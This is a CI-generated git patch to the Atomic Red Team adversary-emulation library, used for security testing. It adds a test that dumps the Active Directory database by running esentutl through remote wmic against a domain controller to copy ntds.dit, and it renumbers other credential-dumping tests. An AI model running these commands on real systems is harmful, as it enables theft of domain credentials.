From 4f16aad6f9dfb0be6c0706b7314339201efd20ce Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 9 Feb 2022 15:14:59 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs
 branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  5 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  5 +-
 atomics/Indexes/Indexes-Markdown/index.md     |  5 +-
 .../Indexes/Indexes-Markdown/windows-index.md |  5 +-
 atomics/Indexes/index.yaml                    | 39 +++++++++++++
 atomics/T1003.003/T1003.003.md                | 58 +++++++++++++++++--
 6 files changed, 105 insertions(+), 12 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 2816134b..4e1e429f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -70,8 +70,9 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
 credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
 credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
-credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
+credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 8af9c350..7adb63e8 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -50,8 +50,9 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
 credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
 credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
-credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
+credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index ba0c1d26..485ad2cf 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -103,8 +103,9 @@
   - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
   - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
   - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
-  - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows]
-  - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
+  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #1: Packet Capture Linux [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 67f8c56b..f9559a4b 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -78,8 +78,9 @@
   - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
   - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
   - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
-  - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows]
-  - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
+  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Windows Internal Packet Capture [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 26fd893d..5ca6a17f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -4401,6 +4401,45 @@ credential-access:
       executor:
         command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
 
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Create Volume Shadow Copy remotely (WMI) with esentutl
+      auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+      description: |
+        This test is intended to be run from a remote workstation with domain admin context.
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_path:
+          description: File to shadow copy
+          type: String
+          default: c:\windows\ntds\ntds.dit
+        target_path:
+          description: Target path of the result file
+          type: String
+          default: c:\ntds.dit
+        target_host:
+          description: IP Address / Hostname you want to target
+          type: String
+          default: localhost
+      dependencies:
+      - description: 'Target must be a reachable Domain Controller, and current context
+          must be domain admin
+
+'
+        prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
+
+'
+        get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
+          firewall or permissions (must be admin on target)
+
+'
+      executor:
+        command: 'wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe
+          /y /vss #{source_path} /d #{target_path}"
+
 '
         name: command_prompt
         elevation_required: true
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index 538f34a2..25aa64db 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -24,9 +24,11 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 
 - [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
 
-- [Atomic Test #6 - Create Volume Shadow Copy with Powershell](#atomic-test-6---create-volume-shadow-copy-with-powershell)
+- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
 
-- [Atomic Test #7 - Create Symlink to Volume Shadow Copy](#atomic-test-7---create-symlink-to-volume-shadow-copy)
+- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
+
+- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
 
 
 <br/>
@@ -306,7 +308,55 @@ echo Sorry, can't connect to target host, check: network, firewall or permission
 <br/>
 <br/>
 
-## Atomic Test #6 - Create Volume Shadow Copy with Powershell
+## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
+This test is intended to be run from a remote workstation with domain admin context.
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| source_path | File to shadow copy | String | c:&#92;windows&#92;ntds&#92;ntds.dit|
+| target_path | Target path of the result file | String | c:&#92;ntds.dit|
+| target_host | IP Address / Hostname you want to target | String | localhost|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
+##### Check Prereq Commands:
+```cmd
+wmic /node:"#{target_host}" shadowcopy list brief
+```
+##### Get Prereq Commands:
+```cmd
+echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Create Volume Shadow Copy with Powershell
 This test is intended to be run on a domain Controller.
 
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -341,7 +391,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 <br/>
 <br/>
 
-## Atomic Test #7 - Create Symlink to Volume Shadow Copy
+## Atomic Test #8 - Create Symlink to Volume Shadow Copy
 This test is intended to be run on a domain Controller.
 
 The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.